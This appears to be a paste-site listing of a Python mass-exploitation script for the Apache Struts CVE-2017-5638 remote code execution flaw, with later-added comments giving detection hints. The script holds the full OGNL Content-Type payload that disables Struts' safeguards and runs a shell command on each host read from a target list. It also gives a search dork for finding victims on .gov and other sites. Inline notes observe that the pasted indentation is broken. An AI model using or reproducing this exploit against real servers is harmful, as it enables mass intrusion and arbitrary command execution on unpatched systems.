LNO_LiGhT

Apache Struts (CVE-2017-5638) RCE Mass Scanner

Mar 28th, 2017
  1. #!/usr/bin/python
  2. # Modded Apache Struts2 RCE Exploit CVE-2017-5638 | By; LiGhT
  3. # Dork: "site:com filetype:action"
  4. # site example^: org,net,egu,gov,io,pw
  5.  
  6. import urllib2
  7. import httplib
  8. import sys, re, os
  9.  
  10. strutz = open(sys.argv[1], "r").readlines()
      # Reads the file named by the first command-line argument into a list of
      # lines; the loop at the bottom of the script iterates over this list.
      # For responders: if this script is recovered during an investigation,
      # the file passed here is presumably the list of hosts it was pointed
      # at, and is worth preserving alongside the script.
  11.  
  12. def exploit(url, cmd):
          # Builds an OGNL expression around `cmd`, sends it as the Content-Type
          # header of a urllib2 request to `url` (no request body is supplied),
          # and prints whatever response body comes back.
          #
          # Defender view (CVE-2017-5638): the only unusual part of the request
          # is the Content-Type value. It starts with "%{" and contains strings
          # such as "ognl.OgnlContext", "#_memberAccess" and
          # "java.lang.ProcessBuilder", none of which belong in a legitimate
          # Content-Type header. WAF/IDS rules and log searches can key on them.
          # NOTE(review): many default access-log formats do not record
          # Content-Type; confirm your logging captures request headers before
          # relying on log review.
          # Header filtering is a stopgap; the fix is upgrading Struts to a
          # release that addresses CVE-2017-5638.
          #
          # NOTE(review): indentation in this listing is inconsistent as pasted
          # (e.g. the body of `try:`), so the nesting below cannot be read
          # reliably from this page.
  13.     page = ''
  14.     payload = "%{(#_='multipart/form-data')."
  15.     payload += "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
  16.     payload += "(#_memberAccess?"
  17.     payload += "(#_memberAccess=#dm):"
  18.     payload += "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])."
  19.     payload += "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."
          # The next three fragments clear OgnlUtil's excluded-package and
          # excluded-class lists and swap in the default member-access policy,
          # i.e. the expression removes the framework's own OGNL restrictions
          # before doing anything else.
  20.     payload += "(#ognlUtil.getExcludedPackageNames().clear())."
  21.     payload += "(#ognlUtil.getExcludedClasses().clear())."
  22.     payload += "(#context.setMemberAccess(#dm))))."
  23.     payload += "(#cmd='%s')." % cmd
          # The expression picks cmd.exe /c or /bin/bash -c by OS name and
          # starts it through ProcessBuilder. On the host this appears as a
          # shell spawned as a child of the Java application server process,
          # which is a strong signal for EDR / audit rules.
  24.     payload += "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))."
  25.     payload += "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))."
  26.     payload += "(#p=new java.lang.ProcessBuilder(#cmds))."
  27.     payload += "(#p.redirectErrorStream(true)).(#process=#p.start())."
          # Process output is copied into the servlet response stream, so a
          # response body that does not look like the application's normal
          # output is a network-side indicator.
  28.     payload += "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))."
  29.     payload += "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))."
  30.     payload += "(#ros.flush())}"
  31.  
  32.     # cmd can be exit if you wanna quit the session
  33.     try:
  34.     if cmd.lower() == "exit":
  35.         pass
  36.     else:
  37.         url = ''.join(url)
  38.         if "http://" not in url:
  39.             url = "http://"+url
  40.         elif "https://" in url:
  41.             url = url.replace("https://", "http://")
  42.         else:
  43.             pass
              # The User-Agent is a fixed generic string and trivially changed,
              # so it is a weak indicator on its own; the Content-Type value
              # is the part to match on.
  44.             headers = {'User-Agent': 'Mozilla/5.0', 'Content-Type': payload}
  45.             request = urllib2.Request(url, headers=headers)
  46.             page = urllib2.urlopen(request).read()
          # Every error path below is swallowed; `page` then keeps its initial
          # empty value and the final print emits only the colour code.
  47.     except httplib.IncompleteRead, e:
  48.         pass
  49.     except KeyboardInterrupt:
  50.     print
  51.         pass
  52.     except Exception:
  53.         pass
  54.     print "\033[35m%s"%(page)
  55.  
  56.  
  57. for url in strutz:
          # For each entry read from the input file, prompts the operator for
          # one command and hands both to exploit().
          # Defender note: every listed host therefore receives a
          # command-bearing request rather than a passive probe, so a matching
          # Content-Type in your logs should be triaged as attempted code
          # execution, not reconnaissance.
          # KeyboardInterrupt and all other exceptions are caught and discarded
          # inside the loop body.
  58.     try:
  59.         cmd = raw_input("\033[32mShell\033[37m> ")     
  60.         exploit(url, cmd)
  61.     except KeyboardInterrupt:
  62.         print
  63.         pass
  64.     except Exception:
  65.         pass